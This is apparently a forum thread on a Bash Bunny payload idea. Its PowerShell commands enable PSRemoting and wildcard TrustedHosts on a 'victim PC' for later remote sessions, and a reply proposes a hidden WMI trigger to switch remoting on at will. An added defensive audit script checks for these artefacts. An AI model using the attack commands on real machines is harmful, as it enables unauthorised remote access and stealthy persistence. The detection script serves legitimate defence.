
Remote Exec via PS (Payload Idea)

Dave-ee Jones

So here's a quick payload idea...

Plug the BB into the victim PC and enable remote connections in PS:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\TrustedHosts "172.16.16.*"

Head to another PC and launch remote PS commands (your laptop on the same network, maybe?):

Enter-PSSession -ComputerName "George"

Might work on the payload tomorrow or something, get a quick version going. I just posted to see what others could come up with or just have a Devil's Advocate try and stump me (probably not hard in this case).


Hmm, been a while since I enabled PSRemoting. I do not recall, but after enabling it does the machine usually require a reboot?

If not, there is actually an even more hidden idea: a WMI trigger to enable PSRemoting and allow your IP when some external event that you can control happens on the network or with a service on the machine.

Use the bunny to create the trigger, and now there is no PSRemoting port open. Trigger the WMI event from another machine so PSRemoting is enabled, and then connect. When done you may have an event to shut it back down too.

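An added, defender-side example (not code from either post): a PowerShell audit that checks a host for the artefacts the approach discussed in this thread would leave behind, namely an active WinRM listener, a widened TrustedHosts list, permanent WMI event subscriptions, and the WMI-Activity event that records their registration. It assumes an elevated PowerShell 5.1 or later session on the audited host.

```powershell
# Added defensive audit (not the thread's code): look for what the payload idea above
# would leave on a host. Assumes it is run from an elevated PowerShell 5.1+ session.
$findings = @()

# 1. WinRM service running with a listener means the host accepts remote sessions.
$winrm = Get-Service -Name WinRM -ErrorAction SilentlyContinue
if ($winrm -and $winrm.Status -eq 'Running') {
    Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
        ForEach-Object { $findings += "WinRM listener present: $($_.Name)" }
}

# 2. A non-empty TrustedHosts (especially a wildcard such as 172.16.16.*) is a change
#    a workstation rarely needs; record it for review.
$trusted = (Get-Item -Path WSMan:\localhost\Client\TrustedHosts -ErrorAction SilentlyContinue).Value
if ($trusted -and $trusted.Trim()) { $findings += "TrustedHosts = '$trusted'" }

# 3. Permanent WMI subscriptions live in root\subscription as filter + consumer + binding.
#    A "run this when X happens" trigger is usually a CommandLineEventConsumer or
#    ActiveScriptEventConsumer, so inspect the command or script it carries.
$ns = 'root\subscription'
$consumers = Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue
foreach ($c in $consumers) {
    $body = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
    $flag = if ($body -match 'Enable-PSRemoting|TrustedHosts|winrm') { ' [touches remoting]' } else { '' }
    $findings += "WMI consumer '$($c.Name)' ($($c.CimClass.CimClassName))$flag; body: $body"
}
Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue |
    ForEach-Object { $findings += "WMI filter '$($_.Name)': $($_.Query)" }
Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
    ForEach-Object { $findings += "WMI binding: $($_.Filter.Name) -> $($_.Consumer.Name)" }

# 4. WMI-Activity event 5861 records permanent consumer registrations, giving a timeline
#    of when a trigger like the one described above was installed.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WMI-Activity/Operational'; Id = 5861 } `
    -MaxEvents 20 -ErrorAction SilentlyContinue |
    ForEach-Object { $findings += "$($_.TimeCreated) WMI-Activity 5861: $($_.Message -replace '\s+', ' ')" }

if ($findings.Count -eq 0) { 'No remoting or WMI-subscription artefacts found.' } else { $findings }
```

Any hit in sections 2 or 3 on a workstation that is not meant to be managed over WinRM is worth a ticket; section 4 tells you when the subscription appeared so it can be matched against physical access or USB device logs.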
